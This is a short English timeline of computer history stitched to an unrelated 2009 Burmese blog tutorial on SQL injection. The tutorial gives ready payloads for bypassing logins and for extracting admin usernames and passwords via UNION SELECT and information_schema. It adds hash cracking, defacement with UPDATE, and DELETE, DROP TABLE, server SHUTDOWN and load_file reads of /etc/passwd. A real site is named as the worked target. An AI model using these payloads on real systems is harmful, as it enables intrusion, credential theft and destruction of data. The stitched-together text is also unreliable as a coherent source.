IBM 701 EDPM Computer
IBM enters into 'The History of Computers'.
1954
John Backus & IBM
FORTRAN Computer Programming Language
The first successful high level programming language.

1955
(In Use 1959)

Stanford Research Institute, Bank of America, and General Electric
ERMA and MICR
The first bank industry computer - also MICR (magnetic ink character recognition) for reading checks.
1958
Jack Kilby & Robert Noyce
The Integrated Circuit
Otherwise known as 'The Chip'
1962
Steve Russell & MIT
Spacewar Computer Game
The first computer game invented.
1964
Douglas Engelbart
Computer Mouse & Windows
Nicknamed the mouse because the tail came out the end.
1969
ARPAnet The original Internet.
1970
Intel 1103 Computer Memory The world's first available dynamic RAM chip.
1971
Faggin, Hoff & Mazor
Intel 4004 Computer Microprocessor
The first microprocessor.
1971
Alan Shugart &IBM
The "Floppy" Disk
Nicknamed the "Floppy" for its flexibility.
1973
Robert Metcalfe & Xerox
The Ethernet Computer Networking
Networking.
1974/75
Scelbi & Mark-8 Altair & IBM 5100 Computers The first consumer computers.
1976/77
Apple I, II & TRS-80 & Commodore Pet Computers More first consumer computers.
1978
Dan Bricklin & Bob Frankston
VisiCalc Spreadsheet Software
Any product that pays for itself in two weeks is a surefire winner.
1979
Seymour Rubenstein & Rob Barnaby
WordStar Software
Word Processors.
1981
IBM
The IBM PC - Home Computer
From an "Acorn" grows a personal computer revolution
1981
Microsoft
MS-DOS Computer Operating System
From "Quick And Dirty" comes the operating system of the century.
1983
Apple Lisa Computer The first home computer with a GUI, graphical user interface.
1984
Apple Macintosh Computer The more affordable home computer with a GUI.
1985
Microsoft Windows Microsoft begins the friendly war with Apple.




Monday, October 26, 2009

SQL Injection သုိ႔မဟုတ္ Hacker ေတြရဲ႕ တုိက္ကြက္ဆန္း




--- မိတ္ဆက္---

Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္ရဲ႕ အၿမင္နဲ႔ နဲနဲေလာက္ Tutorial တစ္ခုအၿဖင့္ေရးသားလုိက္ပါတယ္။ SQL injectiong နဲ႔ပက္သက္တဲ႔ Tutorial ေတြကုိ Google မွာ ရွာၾကည့္လုိက္ပါက ေတာင္လုိပုံေနပါတယ္။ အားလုံးကေတာ့ အတူတူပါပဲ... SQL injector ေတြၿဖစ္ေစရန္တစ္ခုအတြက္မဟုတ္ပဲ SQL Injection နဲ႔အတူ php နဲ႔ mysql functions ေလးေတြကုိ သိကာ security ပုိင္းကုိ ထိန္းသိန္းကာကြယ္ႏုိင္ရန္အတြက္ ရည္ရြယ္၍ Computer ေ၀ါဟာရကုိ ၿမန္မာလုိ တုိက္ရုိက္ဘာသာၿပန္ရတာ နဲနဲေတာ့ နားရႈပ္သြားႏုိင္မယ္။ ဒါေပမဲ႔ အတတ္ႏုိင္ဆုံးေတာ့ နားလည္ေအာင္ ရွင္းၿပေပးလုိက္ပါတယ္။ SQL Injection ကုိေလ့လာတဲ႔အခါမွာ အေၿခခံ Web Developement ပုိင္းအေၿခခံရွိဖု႔ိေတာ့လိုပါလိမ့္မယ္.. ဒီ tutorial အတြက္ လုိအပ္တာကေတာ့ php နဲ႔ sql အေၾကာင္းသိထားရင္ နားလည္ေလာက္ပါတယ္။

---DATABASE ဆိုတာဘာလဲ?---
ရုိးရုိးရွင္းရွင္းပါပဲ... Database ဆုိတာဘာလဲဆုိရင္ Database ဆုိတာ အခ်က္အလက္ Data ေတြစုစည္းသိမ္းဆည္းထားတဲ႔ Application တစ္ခုပါပဲ... Application Programming Interface (API) ေတြကုိ တည္ေဆာက္ အသုံးၿပဳမယ္ ထိန္းသိမ္း သိမ္းဆည္းထားမယ္။ Database(DB) servers ေတြဟာ Web development လုပ္ငန္းေတြ နဲ႔လည္း ေပါင္းစည္းအသုံးၿပဳလုိ႔ရတဲ႔အတြက္ ၄င္းအထဲက data ေတြကုိ ထုတ္ယူအသုံးၿပဳ၊ ၾကည့္ရႈ႕ဖုိ႔ဆုိတာ ခက္ခဲ႔တဲ႔ကိစၥတစ္ခုေတာ့မဟုတ္ပါဘူး။ Database အထဲမွာ usernames, passwords စသည္ ေတြလုိ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိလည္း သိမ္းဆည္းႏုိင္တာ ၿဖစ္တဲ႔အတြက္ Database ရဲ႕ လုံၿခံဳေရးဟာလည္း အလြန္ကုိအေရးၾကီးပါတယ္။ ထိန္းသိမ္းမႈ ညံ့ဖ်င္းတဲ႔ database တစ္နည္းအားၿဖင့္ အမွတ္တမဲ႔ၿဖစ္ေစ၊ သတိမမႈ၍ေသာ္လည္းေကာင္း၊ အေၾကာင္းေၾကာင္းအမ်ဳိးမ်ဳိးေၾကာင့္ programmer ေတြေရးသားထားတဲ႔ code ေတြရဲ႕ လြဲမွားမႈေတြ ေၾကာင့္ ဒီလုိဟာကြက္ေတြ ၿဖစ္ေပၚကာ database ထဲကုိ အၿခား တရားမ၀င္ ၀င္ေရာက္သူတုိ႔အား လမ္းဖြင့္ေပးသလုိၿဖစ္သြားတတ္ပါတယ္။ DB servers ေတြအမ်ားၾကီးရွိတဲ႔အထဲမွာ ဒါေလးေတြက အသုံးမ်ားတာေလးေတြပါ။
MySQL(Open source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open source),
SQLite စသည္ေပါ႔...

Database ရဲ႕ တည္ေဆာက္ပုံေလးကုိ ၿမင္ႏုိင္ေအာင္လုိ႔ ဇယားေလးနဲ႔ၿပထားတာပါ။

--- SQL INJECTION ဆုိသည္မွာ?---
SQL injection ဆုိတာကေတာ့ ယေန႔ေခတ္ အင္တာနက္စာမ်က္ႏွာေပၚမွာ အၿဖစ္အမ်ားဆုံး web application အမွားၿဖစ္ပါတယ္။ ၄င္း web application အမွားတစ္ခုမွေန၍ တရားမ၀င္ ၀င္ေရာက္အသုံးၿပဳသူေတြ (Hackers) က မိမိတုိ႔ရဲ႕ အေရးၾကီးတဲ႔ အခ်က္အလက္ေတြကုိ ခုိးယူသြားႏုိင္ပါတယ္။ ဒါေၾကာင့္ SQL injection ဆုိတာ web or db server တုိ႔ရဲ႕ အမွားေၾကာင့္မဟုတ္ပဲ အေတြ႔အၾကံဳမ့ဲ၊ အေရအခ်င္း ည့ံဖ်င္းတဲ႔ programming ေရးဆြဲသူေတြေၾကာင့္သာၿဖစ္ပါတယ္။ ဒီနည္းလမ္းက အေ၀းတစ္ေနရာကေန application, web server ကုိ အလြယ္ ကူဆုံးထိန္းခ်ဳပ္ႏုိင္ပါတယ္။ ဒီ SQL injection မွာ ပုံစံအမ်ဳိးမ်ဳိးေသာ SQL commands ေတြ နဲ႔ web page ကေန အမ်ဳိးမ်ဳိးေသာ data ေတြကို ထုတ္ယူႏုိင္ပါတယ္။

ဥပမာတစ္ခုအေနနဲ႔ေၿပာမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က Company တစ္ခုရဲ႕ Network တစ္ခုကုိ၀င္ေရာက္ေတာ့မယ္ဆုိရင္ port scanner ေတြနဲ႔ sanner ဖတ္ၿပီး အမွားေတြနဲ႕ ပြင့္ဟေနတဲ႔ port ကေန ၀င္ေရာက္သြားႏုိင္ပါတယ္။ ဒါေပမဲ႔လည္း အင္တာနက္နဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ Web Server (Host Sever) တစ္ခုက port 80 ေလာက္ပဲဖြင့္မယ္၊ တစ္ၿခား security ပုိင္းေတြ ေပးထားမယ္ဆုိရင္ port scanner ဘယ္ေလာက္ေကာင္းေကာင္း အလုပ္ၿဖစ္မွာမဟုတ္ပါဘူး၊ ၀င္ေရာက္ဖုိ႔ခက္သြားပါလိမ့္မယ္( ခက္ခဲေနမယ္ )... ဒါဆုိရင္ Web Hacking ကုိ ဦးတည္ၿပီးေၿပာင္းၾကည့္ရပါလိမ့္မယ္... Web Hacking လုိ႔ေၿပာရင္ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ SQL Injection ကုိပထမဦးစြာေၿပးၿမင္ၾကမွာပါပဲ... ဟုတ္တယ္ေလ.. SQL Injection ကတစ္ၿခားဘာမွမလုိဘူး Web Browser တစ္ခုပဲလုိတယ္...

---ေရွာင္ကြင္း ၀င္ေရာက္ၿခင္း---
Site ေတြမွာ username, password ေတြနဲ႔ login ၀င္ခုိင္းတယ္ဆုိတာ site အထဲမွာ ရွိတဲ႔ content ေတြကုိ မွတ္ပုံတင္ထားတဲ႔သူ (username & password ရွိထားတဲ႔သူ) ေတြကုိသာ ၾကည့္ရႈအသုံးၿပဳခြင့္ေပးထားတာပါ။ အကယ္၍ မိတ္ေဆြက username & password မရွိပဲ ရွိသကဲ႔သုိ႔ ၀င္ေရာက္အသုံးၿပဳမယ္ (user registration မလုပ္ပဲ ၀င္ေရာက္တယ္) ဆုိရင္ ဒါကုိ BYPASSING LOGINS လုပ္တယ္လုိ႔ေခၚပါတယ္။ ဒါကေတာ့ programmer ရဲ႕ login မွာစီစစ္မႈ မေသခ်ာလုိ႔ ၿဖစ္တဲ႔အတြက္ ကံေကာင္းေထာက္မစြာနဲ႔ User name နဲ႔ Password ကုိမသိပဲ login ၀င္လုိ႔ရသြားပါလိမ့္မယ္။

ဥပမာတစ္ခုအေနနဲ႔ ၾကည့္မယ္ဆုိရင္ username က admin ၿဖစ္ၿပီး password က 12345 ဆုိၾကပါစုိ႔... ဒါဆိုရင္ SQL query က
SELECT USER from database WHERE username='admin' AND password='12345' ဆုိၿပီးၿဖစ္သြားပါလိမ့္မယ္..... အကယ္၍ အေပၚ SELECT command တန္ဖုိးက မွန္တယ္ဆုိရင္ site ထဲကုိ ၀င္ခြင့္ၿပဳမွာၿဖစ္ပါတယ္။ အကယ္၍ အထက္ပါေၿပာခဲ႔သလုိ programmer က login မွာမွန္ကန္တဲ႔စီစစ္မႈမရွိရင္ Hacker ေတြက ေအာက္ပါအတုိင္း ၀င္ေရာက္သြားႏုိင္ပါတယ္။

username:a or 1=1--
password:blank

SQL query မွာေတာ့

SELECT USER from database WHERE username='a' or 1=1-- AND password=''

ဒါက comment operator ပါ အဲ႔လုိပဲ အၿခား comment operator က /* ၿဖစ္ပါတယ္။

SELECT USER from database WHERE username='a' or 1=1

1=1 က အၿမဲတန္း query ကုိ true ၿဖစ္ေစၿပီး OR ကေတာ့ query တစ္ခုက true ၿဖစ္တဲ႔အတြက္ အၿခားတစ္ခုကုိလည္း true ၿဖစ္သြားေစပါတယ္ဒါေၾကာင့္ 'a' ဆုိတဲ႔ user ဟာ DB မွာမရွိေတာင္မွ ဒီ query က true ၿဖစ္ကာ site admin ကို၀င္ေရာက္ခြင့္ေပးသြားပါလိမ့္မယ္... ဒီလုိနည္းနဲ႔ Vulnerable ၿဖစ္တဲ႔ site ေတြအတြက္ ေအာက္ပါအတုိင္း စမ္းစစ္ႏုိင္ပါေသးတယ္...

username:' or 1='1 password:' or 1='1
username:' or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1

--- လ်ဳိ႕၀ွက္ထားေသာ Data မ်ားကုိ ၀င္ေရာက္အသုံးၿပဳၿခင္း---
SQL injection က အခုလုိ bypassing logins တစ္ခုတည္းမဟုတ္ပဲ DB servers ကေန လ်ဳိ႕၀ွက္စြာသိမ္းဆည္းထားတဲ႔ Data ေတြကုိ ရယူႏုိင္ပါတယ္... အနည္းငယ္ရႈပ္ေထြးေနမွာၿဖစ္တဲ႔အတြက္ နဲနဲေလး အထူးဂရုၿပဳၿပီးေတာ့ ေလ့လာၾကည့္ပါ။ ေအာက္ပုိင္းမွာ လက္ေတြ႔စမ္းလုိ႔ရေအာ္ site link နဲ႔ တကြ ေဖာ္ၿပေပးထားပါတယ္။

---အားနည္းခ်က္ အမွားမ်ား ရွာေဖြစစ္ေဆးၿခင္း---
Site တစ္ခုကုိရွာလုိက္မယ္...
In PHP ==>>
www.site.com/article.php?id=5

id variable assign လုပ္ထားတဲ႔ ေနာက္နားက ' (apostrophe) ေလးတစ္ခုကုိ ထည့္လုိက္ပါမယ္..

www.site.com/article.php?id=5'
ဒီလုိလုိ စမ္းတဲ႔ေနရာမွာ
Integer Based

www.site.com/script.php?param=36'
www.site.com/script.php?param='36'
www.site.com/script.php?param=(12+24)
www.site.com/script.php?param=%
www.site.com/script.php?param=36'a

String Based

www.site.com/script.php?param=Text'--
www.site.com/script.php?param=Te'+'xt
www.site.com/script.php?param=Tex%
ဆုိၿပီးရွိပါတယ္.. အဆင္ေၿပသလုိ စမ္းသပ္ႏုိင္ပါတယ္...

အကယ္၍ ၄င္းရဲ႕ site က vulnerable မၿဖစ္ဘူးဆုိရင္ ပုံမွန္အတုိင္း page loading လုပ္သြားပါလိမ့္မယ္..
အဲ႔လုိမဟုတ္ပဲ query string filtering မရွိဘူးဆုိရင္ "MySQL Syntax Error By '5'' In Article.php on line 15." သုိမဟုတ္ Check the correct MySQL version သုိ႔မဟုတ္ MySQL Fetch error သုိ႔မဟုတ္ပါက ဘာမွမေပၚပဲ page အၿဖဴၾကီးသာေပၚေနပါလိမ့္မယ္... ဒါဆုိရင္ ဒီ site က vulnerable ၿဖစ္ေနပါတယ္ အကယ္၍ ' ၿဖင့္ မရလွ်င္ ေအာက္ပါအတုိင္း union select 1-- ဆုိတာကုိသုံးႏုိင္ပါတယ္။

www.site.com/article.php?id=5 union select 1--

In ASP ==>>
အထက္ပါနည္းအတုိင္း
http://www.site.com/index.asp?id=5
ဆုိရင္ ေနာက္က ' (apostrophe) ေလးထည့္ၿပီးစမ္းႏုိင္ပါတယ္။
http://www.site.com/index.asp?id=5'
ဒါဆုိရင္

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

ဆုိတဲ႔ error မ်ဳိးေပၚေနတတ္ၿပီး ASP, JSP, CGI, နဲ႔ PHP web pages ေတြမွာ စမ္းသပ္ႏုိင္ပါတယ္။

အကယ္၍ URL မွာ မေပၚတဲ႔ parameters မ်ဳိးဆုိရင္ ၄င္းတုိ႔ရဲ႕ login page, search page, feedback လုိေနရာမ်ဳိးေတြက ရွာႏုိင္ပါတယ္.. တစ္ခ်ဳိ႕ html page ေတြက POST command နဲ႔ ASP page ကုိ ပုိ႔ေဆာင္ေပးတဲ႔ parameters သုံးထားတတ္ပါတယ္.. ဒါဆုိရင္ေတာ့ ၄င္းတုိ႔ရဲ႕ HTML source code ထဲကုိ ၀င္ေရာက္ပါ။ ၿပီးရင္ "FORM" tag ကုိရွာလုိက္ပါ ... ဥပမာ

<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>


ဒီ <FORM></FORM> ႏွစ္ခုၾကားက ၿဖစ္ႏုိင္ေၿခေတြပါ။

<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value='a' or 1=1--">
</FORM>


value မွာ အေပၚကအတုိင္း BYPASSING LOGINS မွာသုံးသလုိ စမ္းသပ္ၿပီးရွာေဖြႏုိင္ပါတယ္။


---Columns အေရအတြက္ရွာေဖြၿခင္း---
‘order by’ ကုိအသုံးၿပဳၿပီး Columns မ်ားကုိ ရွာေဖြမွာၿဖစ္ပါတယ္..
URL query ကုိေအာက္ပါတုိင္း ရုိက္ထည့္လုိက္ပါမယ္... '/*' သုိ႔မဟုတ္ '--" ဆုိတာေလးသုံးလုိ႔ရပါတယ္..

www.site.com/article.php?id=5 order by 1/*
အမွားမေပၚဘူးဆုိရင္ ေနာက္တစ္ခါ 2 ဆုိၿပီးတုိးကာ ရုိက္ထည့္ပါမယ္

www.site.com/article.php?id=5 order by 2/*
ယခုအခ်ိန္အထိ အမွားမေပၚေသးဘူးဆုိရင္ ေနာက္တစ္ ထပ္ၿပီးတုိးပါမယ္.. ဒီလုိတုိးတုိးၿပီး အမွားေပၚလာတဲ႔အထိ ရွာေဖြရမွာၿဖစ္ပါတယ္...

www.site.com/article.php?id=5 order by 3/*

အခု 3 ကုိေရာက္တဲ႔အခါ အမွားေတြ႔တယ္ဆုိရင္
ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns ႏွစ္ခုရွိတယ္ဆုိတာ သိသြားပါၿပီ... ဒီလုိနည္းနဲ႔ Column ေတြကုိ တစ္ဆင့္ၿခင္းရွာေဖြရပါတယ္...

ေနာက္တစ္ခု ပုံနဲ႔ တကြ ရွာေဖြၾကည့္ရေအာင္


http://sbisa.org/circle.php?id=26 ကုိၾကည့္မယ္..



http://sbisa.org/circle.php?id=26 ရဲ႕ value ေနာက္မွာ ' ဆုိတဲ႔ (apostrophe) တစ္ခုထည့္လုိက္ပါမယ္..



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sbisaor/public_html/circle.php on line 10 ဆုိတဲ႔ error တစ္ခုေတြ႔ပါလိမ့္မယ္..

ဒါဆုိရင္ေသခ်ာတယ္.. SQL error တစ္ခုတက္ေနၿပီ... တိတိက်က်ေၿပာရရင္ DB Server က MySQL
OK, ဒါဆုိရင္ ကၽြန္ေတာ္တုိ႔ Columns အေရအတြက္ရွာမယ္...

http://sbisa.org/circle.php?id=-26 order by 1,2,3,4,5,6-- ဒီအထိအဆင့္အဆင့္ရွာတယ္... error မၿဖစ္ေသးဘူး



7 အထိေရာက္တဲ႔အခါမွာေတာ့ error ေတြ႔တယ္ဆုိရင္ ဒါဟာ 6 Columns ရွိတယ္...



ဒါဆုိရင္ေနာက္ထပ္ UNION SELECT ALL ဆုိတဲ႔ statement တစ္ခုကုိသုံးမယ္..
http://sbisa.org/circle.php?id=-26 union select all 1,2,3,4,5,6-- ဆုိၿပီးရုိက္ထည့္လုိက္မယ္..



ဒါဆုိရင္ 2,3,4 ဆုိတာၿပမယ္.. ဒီအပုိင္းေတြက data ေတြသိမ္းဆည္းထားတဲ႔ Columns ေတြၿဖစ္တယ္...

---MySQL version ရွာၿခင္း---
ဒီ Injection မွာ MySQL Version ကုိ checking လုပ္ဖုိ႔လုိပါတယ္... . Version အား Checking လုပ္ရန္ @@version သုိ႔မဟုတ္ version() functions ေတြကုိသုံးေပးရပါမယ္..
အခု @@version ကုိ data ေတြသိမ္းဆည္းထားတဲ႔ column မွာထည့္ၿပီး MySQL version ကုိစစ္မယ္..

http://sbisa.org/circle.php?id=-26 union select all 1,@@version,3,4,5,6--



သုိ႔မဟုတ္

http://sbisa.org/circle.php?id=-26 union select all 1,version(),3,4,5,6--

ကုိသုံးႏုိင္ပါတယ္.. တခါတစ္ေလမွာ အထက္ပါနည္းအတုိင္းက error ေတြၿဖစ္တတ္တဲ႔အတြက္ unhex(hex()) ကုိသုံးေပးရပါမယ္..

http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex(@@version)),3,4,5,6--

ဒါဆုိရင္ Server မွာ အသုံးၿပဳေနတဲ႔ MySQL ရဲ႕ version ကုိေဖာ္ၿပေပးသြားပါလိမ့္မယ္...
အကယ္၍ user တုိ႔ ၊ database တုိ႔ကုိ check ခ်င္တယ္ဆုိရင္ ေအာက္ပါတုိင္း checking လုပ္ႏုိင္ပါတယ္..

www.site.com/article.php?id=5 UNION ALL SELECT user(),2/*
www.site.com/article.php?id=5 UNION ALL SELECT database(),2/*

ဥပမာ :- http://sbisa.org/circle.php?id=-26 union select all 1,version(),database(),user(),5,6--



---MySQL 5 ႏွင့္အထက္ injection---
အခုကၽြန္ေတာ္တုိ႔ ရတာ MySQL version 5.0.90 ၿဖစ္ပါတယ္... MySQL version 5 မွာ information_schema ဆုိတဲ႔ အသုံး၀င္တဲ႔ funtion တစ္ခုပါ၀င္ၿပီး ၄င္းက လက္ရွိ DB server ရဲ႕ tables နဲ႔ columns ေတြကုိ ထိန္းသိမ္းထားတာၿဖစ္ပါတယ္...
Tables ေတြကုိရယူရန္ table_name from information_schema.tables ဆုိတာကုိသုံးသလုိ
Columns ေတြကုိရယူရန္ column_name from information_schema.columns ဆုိတာကုိသုံးရပါမယ္..
ေနာက္တစ္ခုကေတာ့ ဒီ site အေပၚမွာ ၿမင္ရေအာင္လုိ႔ group_concat(table_name) ကုိ Tables ေတြအတြက္နဲ႔
group_concat(column_name) ကုိ Columns ေတြအတြက္သုံးေပးရပါတယ္...

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--



ေစာေစာက ကၽြန္ေတာ္တုိ႔ MySQL version ကုိ @@version အစား unhex(hex()) နဲ႔သုံးခဲ႔ရတယ္ဆုိရင္ အခု Table နဲ႔ Column ကုိရွာတဲ႔အခါမွာလည္း အဲ႔လုိပဲ သုံးေပးရပါတယ္။

http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

ေနာက္ထက္တစ္ခါ ကၽြန္ေတာ္တုိ႔ Columns ေတြကုိၾကည့္မယ္ဆုိရင္

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--



ဒါဆုိရင္ DB ထဲက table ေတြကုိ ေဖာ္ၿပေပးပါၿပီ... အခု ကၽြန္ေတာ္တု႔ိဒီ tables ေလးေတြကုိ စနစ္တက် မွတ္သားထားပါမယ္... ေနာက္တစ္ဆင့္တက္ကာ ကၽြန္ေတာ္တုိ႔လုိခ်င္တဲ႔ user name နဲ႔ password ေတြ သိမ္းထားတဲ႔ table ကုိၾကည့္ပါမယ္...
group_concat ကုိပဲ ဆက္လက္သုံးပါမယ္.. ဒါေပမဲ႔ ကၽြန္ေတာ္တုိ႔ လုိခ်င္တဲ႔ username, password ေတြသိမ္းထားေလာက္တဲ႔ columns ေတြထဲက စစ္ထုတ္ယူမွာပါ။ ဒီေနရာမွာ ကၽြန္ေတာ္တုိ႔ မွန္းထားတဲ႔ table အမည္ကုိ from information_schema.tables where table_schema=database-- ေနရာမွာ ထည့္သြင္းမွာၿဖစ္ပါတယ္..
0x3a ဆုိတာကေတာ့ ":" ရဲ႕ hex code ပါ။

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--



ဒါဆုိရင္ေတာ့ မိမိတုိ႔လုိခ်င္တဲ႔ username နဲ႔ password ကုိရသြားပါၿပီ... ရရွိထားတဲ႔ password ဟာ plaintext ၿဖစ္တယ္ဆုိရင္ေတာ့ ထပ္ၿပီးေခါင္းရႈပ္စရာမလုိေတာ့ဘူးေပါ႔
တစ္ခ်ဳိ႕ကေတာ့ password hashed လုပ္ထားတဲ႔ အတြက္ ၄င္းတုိ႔အား hash cracker ေတြနဲ႔ ေၿဖထုတ္ေပးရပါလိမ့္မယ္..

ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927

John The Ripper
www.openwalls.org

Cain & Able
www.oxid.it

hash လုပ္ထားတဲ႔ password ေတြသာဆုိရင္ေတာ့ အနည္းငယ္ခက္သြားပါလိမ့္မယ္... အထက္ပါ hash ကုိ crack လုပ္လုိက္ရင္ admin:PlanetCreator ဆုိၿပီးရပါမယ္..
ကဲ ဒါဆုိရင္ေတာ့ admin နဲ႔ password ကုိရၿပီဆုိရင္ ကုိယ္လုပ္ခ်င္သလုိလုပ္ေပေတာ့..

---MySQL version 4 injection---
MySQL version က 4 ၿဖစ္မယ္ဆုိရင္ version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပ္တဲ႔အတြက္ table name နဲ႔ column name ေတြကုိ guess လုပ္ရပါတယ္... ေနာက္တစ္ခုက error message အေပၚမွာအေၿခခံၿပီးခန္႔မွန္းရတာပါ။ The error reports pnc_article in the error ဆုိရင္ pnc ဆုိတဲ႔ prefix ကုိသုံးထားတဲ႔အတြက္ table name က pnc ဆုိတာ ခန္႔မွန္းလုိ႔ရႏုိင္ပါတယ္။


ဥပမာ ကၽြန္ေတာ္က table name ကုိ user ဆုိၿပီး ခန္႔မွန္းလုိက္မယ္.. ဒါဆုိရင္ ေအာက္ပါအတုိင္းရုိက္ထည့္ေပးၾကည့္မယ္ဆုိပါစုိ႔

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*

အထက္ပါအတုိင္းရုိက္ထည့္လုိက္လုိ႔ error ၿဖစ္ေနတယ္ဆုိရင္ ဒါဟာ table မရွိလုိပဲ... ေနာက္တစ္ခါထပ္ၿပီး guess လုိက္ပါ... table name ကုိ tbluser ဆုိၿပီးထားလုိက္ပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*

ဒီလုိနည္းနဲ႔ table name ေတြ column ေတြအား ခန္႔မွန္းၿပီးထည့္သြားရပါလိမ့္မယ္...

www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
ေနာက္ဆုံး username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔...
Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.

ဒါဟာ Injection ရဲ႕ လ်ဳိ႕၀ွက္ထားတဲ႔ Data မ်ားကုိ ရယူတဲ႔အပိုင္းၿဖစ္ပါတယ္... Admin ရဲ႕ username & password ရၿပီဆုိရင္ Admin Login Page မွာရုိက္ထည့္ရပါမယ္... Joomla ဆုိရင္ /administrator နဲ႔ Wordpress ဆုိရင္ /wp-admin ၿဖစ္ပါတယ္.. အခ်ဳိ႕ site ေတြက admin panel ကုိရွာရခက္ ေနပါလိမ့္မယ္.. ဒါဆုိရင္ admin panel finder ေလးေတြကုိသုံးၿပီးရွာေဖြရပါလိမ့္မယ္...


Admin Panel Finder http://www.planetcreator.net/planetcreator/adminpanelfinder/ နဲ႔ရွာႏုိင္ပါတယ္။

---Site အားၿပင္ဆင္ၿခင္း ---
အခ်ဳိ႕ေသာ Site ေတြက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခက္ခဲၿခင္း၊ ရွာမေတြ႔ၿခင္းေတြနဲ႔ ၾကံဳရတတ္ပါတယ္... ဒီလုိေနရာမွာ SQL commands ေတြကုိသုံးၿပီး အထဲက site ရဲ႕ contents ေတြကုိၿပင္ဆင္ေၿပးသြားရမွာၿဖစ္ပါတယ္...

ဒါေလးေတြက အေရးပါတဲ႔ command ေလးေတြပါ
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.

UPDATE :-
www.site.com/article.php?id=5
ဆုိၾကပါစုိ႔ကၽြန္ေတာ္တုိ႔ရဲ႕ query က ေအာက္ပါအတုိင္းၿဖစ္မယ္ဆုိရင္
SELECT title,data,author FROM article WHERE id=5

(table name နဲ႔ column ေတြက အထက္ပါအတုိင္းရွာေဖြက ထည့္ေပးရတာၿဖစ္ပါတယ္)
ေအာက္ပါအတုိင္း site ကုိၿပင္ေပးသြားပါမယ္...


www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*

ခက္ဆန္းဆန္းေလး ထက္ၿပီး အရစ္တက္လုိက္မယ္ဆုိရင္

www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*

သတ္မွတ္ထားတဲ႔ page ေၿပာင္းလဲၿပီး update လုပ္ခ်င္တယ္ဆုိရင္ေတာ့ ေအာက္ပါအတုိင္း ရုိက္ထည့္ေပးရပါတယ္..

www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*

DELETE:- DB Server ထဲကေန အၿမဲတမ္းဖ်က္ပစ္ေတာ့မယ္ဆုိရင္ DELETE command ကုိသုံးသြားပါမယ္..

www.site.com/article.php?id=5 DELETE title,data,author FROM article/*

သတ္မွတ္ထားတဲ႔ page ကုိ delete လုပ္ခ်င္တယ္ဆုိရင္ ေအာက္ပါ table name ရဲ႕ ေနာက္ထဲမွ WHERE နဲ႔ page id ကုိထည့္သြင္းသြားရပါမယ္...

www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*

ဒီတစ္ခုကေတာ့ DROP TABLE ပါ... Table အလုိက္ ဖ်က္ခ်င္တယ္ ဆုိရင္ေတာ့ DROP Table နဲ႔ table name ကုိဆုိၿပီးသုံးပါမယ္...

www.site.com/article.php?id=5 DROP TABLE article/*

ဒီအတုိင္းဖ်က္ရင္ table ေတြေကာ အထဲမွာပါတဲ႔ contents ေတြေကာ အားလုံး ပ်က္သြားပါလိမ့္မယ္...

SHUTTING DOWN MySQL SERVER:

www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;

LOADFILE:
Server အထဲက .htaccess, .htpasswd ေတြနဲ႔ password files ေတြၿဖစ္တဲ႔ etc/passwd စသည့္ ဖုိင္ေတြကုိ ယူခ်င္တယ္ဆုိရင္ေတာ့ LOADFILE ကုိသုံးရပါတယ္... ဒါကအသုံးေတာ့နည္းပါတယ္....

www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*

အကယ္၍ hex ေတြနဲ႔ဆုိရင္ေတာ့ ေအာက္ပါတုိင္း သုံးပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)

ဒါကုိ Hex based SQL Injection လုိ႔လည္းေခၚႏုိင္ပါတယ္..

* SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
